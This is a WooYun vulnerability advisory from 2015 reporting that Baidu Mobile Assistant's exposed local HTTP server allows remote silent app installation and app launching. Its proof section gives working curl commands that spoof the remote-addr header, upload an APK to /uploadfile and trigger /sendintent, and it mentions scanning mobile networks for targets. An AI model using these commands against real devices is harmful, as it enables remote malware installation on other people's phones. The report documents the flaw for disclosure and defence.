漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0145718
漏洞标题:百度手机助手远程静默安装启动应用漏洞(3G/4G环境下远程种马)
相关厂商:百度
漏洞作者: 瘦蛟舞
提交时间:2015-10-10 11:25
修复时间:2016-01-11 15:32
公开时间:2016-01-11 15:32
漏洞类型:远程代码执行
危害等级:高
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-10-10: 细节已通知厂商并且等待厂商处理中
2015-10-10: 厂商已经确认,细节仅向厂商公开
2015-10-13: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航)
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开
简要描述:
漏洞承接自http://www.wooyun.org/bugs/wooyun-2015-0145365
详细说明:
发现百度手机助手监听40310这么奇怪的端口,这里7777先按下不表.
前面的分析和 WooYun: 百度输入法安卓版存在远程获取信息控制用户行为漏洞(可恶意推入内容等4G网络内可找到目标) 差不多根据端口号找到 nano http server 的实现
但是和之前不一样的是多了一些验证,比如 http 头部remote-addr字段的验证
因为之前分析过百度输入法的 http server 所以很多结果就可以直接使用,比如获取目标坐标/IMEI/安装应用/远程发送 intent 等
获取坐标,其他信息获取可以参考 WooYun: 百度输入法安卓版存在远程获取信息控制用户行为漏洞(可恶意推入内容等4G网络内可找到目标)
但是其中又多了一些让人感兴趣的接口,比如uploadfile听着向上传文件,追踪下此调用类的实现看看到底在干什么.
从代码中可以看出这是这个接收文件的操作,和类的命令很一直了.但是继续跟踪其对install_type操作判断后的处理会发现.还有一个令人虎躯一震的功能 静默安装. (一般手机助手都会有一个静默安装功能是需要 root 权限的,这样可以帮助用户省去点击安装的操作.)
我们是否可以利用这个功能达到远程恶意安装应用的目的了而且加上远程发送 intent 的功能,不仅定向安装了应用而且攻击者可以随时随地启动应用.
漏洞证明:
远程上传静默安装应用
curl -F file=@1.apk -e http://m.baidu.com -H "remote-addr: 127.0.0.1" http://192.168.10.127:40310/uploadfile?install_type=all&callback=123&mcmdf=inapp_123&Filename=1.apk&
远程启动应用
curl -e http://m.baidu.com -H "remote-addr: 127.0.0.1" http://192.168.10.127:40310/sendintent?callback=123&mcmdf=inapp_123&intent=intent:#Intent;component=org.wooyun.wifikey/org.wooyun.wifikey.MainActivity;end;&
urlencode
curl -e http://m.baidu.com -H "remote-addr: 127.0.0.1" http://192.168.10.127:40310/sendintent?callback=123&mcmdf=inapp_123&intent=intent%3A%23Intent%3Bcomponent%3Dorg.wooyun.wifikey%2forg.wooyun.wifikey.MainActivity%3Bend%3B&
关于对 3/4G 网络扫描攻击可以参考 WooYun: 百度输入法安卓版存在远程获取信息控制用户行为漏洞(可恶意推入内容等4G网络内可找到目标) 以及小荷才露尖尖角的文章http://drops.wooyun.org/mobile/6973.等俺有测试卡了俺就扩大范围测测,嘿嘿.
注意视频中 wifikey 是 curl 后突然冒出来并启动的哟~
修复方案:
版权声明:转载请注明来源 瘦蛟舞@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2015-10-10 11:50
厂商回复:
感谢提交
最新状态:
暂无